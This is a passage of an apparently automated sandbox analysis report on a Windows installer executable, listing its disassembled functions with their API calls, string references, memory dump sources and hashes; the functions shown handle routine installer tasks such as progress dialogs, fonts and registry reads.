                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,?,?,0040A580,000000FF,C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402536
                                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritelstrlen
                                                                        • String ID: 8$C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
                                                                        • API String ID: 1453599865-4020093364
                                                                        • Opcode ID: c7447fd0e8749cdca90a2cba000cd85fe66b600f003a372b8c9c209f1f138d24
                                                                        • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                        • Opcode Fuzzy Hash: c7447fd0e8749cdca90a2cba000cd85fe66b600f003a372b8c9c209f1f138d24
                                                                        • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                        • GetTickCount.KERNEL32 ref: 00402D53
                                                                        • wsprintfW.USER32 ref: 00402D81
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                          • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,00000AD7), ref: 00402D13
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 722711167-2449383134
                                                                        • Opcode ID: 10ed1b886f90255ba0200a3e5e3570a2ad22fff5ddacabc684ec88c3e3d10c3d
                                                                        • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                        • Opcode Fuzzy Hash: 10ed1b886f90255ba0200a3e5e3570a2ad22fff5ddacabc684ec88c3e3d10c3d
                                                                        • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404A5E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                        • GetMessagePos.USER32 ref: 00404A81
                                                                        • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                        • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                        • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                        • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401D44
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                        • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID: Calibri
                                                                        • API String ID: 3808545654-1409258342
                                                                        • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                        • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                        • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                        • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                        • wsprintfW.USER32 ref: 00402CD1
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                        • API String ID: 1451636040-1158693248
                                                                        • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                        • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                        • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                        • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001096 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                                        • GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCurrentHandleModuleProcProcess
                                                                        • String ID: IsWow64Process$kernel32
                                                                        • API String ID: 4190356694-3789238822
                                                                        • Opcode ID: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                                        • Instruction ID: 3ef6a93ad146ebeaf0d17e4587e90b9f2b778901b0e47637b23e27d0b58942e2
                                                                        • Opcode Fuzzy Hash: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                                        • Instruction Fuzzy Hash: F3E04672905228ABFA10D7E18C4CA8F3BACEB042C1B000511FA01D310DEAA0DA009AA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001862 Relevance: 7.5, APIs: 5, Instructions: 44stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 10001872
                                                                        • lstrlenW.KERNEL32(?,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 1000187D
                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 1000189B
                                                                        • CharNextW.USER32(?,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 100018AD
                                                                        • lstrlenW.KERNEL32(00000000,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 100018B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                                        • Instruction ID: ea7230b3b9df2a54ae5240d03a55c1906f1ad71b73b81b4e1125b9fc16b230e8
                                                                        • Opcode Fuzzy Hash: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                                        • Instruction Fuzzy Hash: 89016D31200628BFEB11DFA4CC809DE77A8EF452D07618069FD04D7216EB70DA41DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                        • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: b9be4b9816400704253340fdef464e42764e8bcf27a5cbf30c6b9d2bcde2083a
                                                                        • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                        • Opcode Fuzzy Hash: b9be4b9816400704253340fdef464e42764e8bcf27a5cbf30c6b9d2bcde2083a
                                                                        • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                        • wsprintfW.USER32 ref: 00404A12
                                                                        • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                        • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                        • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                        • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                        • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                        • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                        • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405DB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,ExecToStack,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405DE1
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405E02
                                                                        • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405E25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
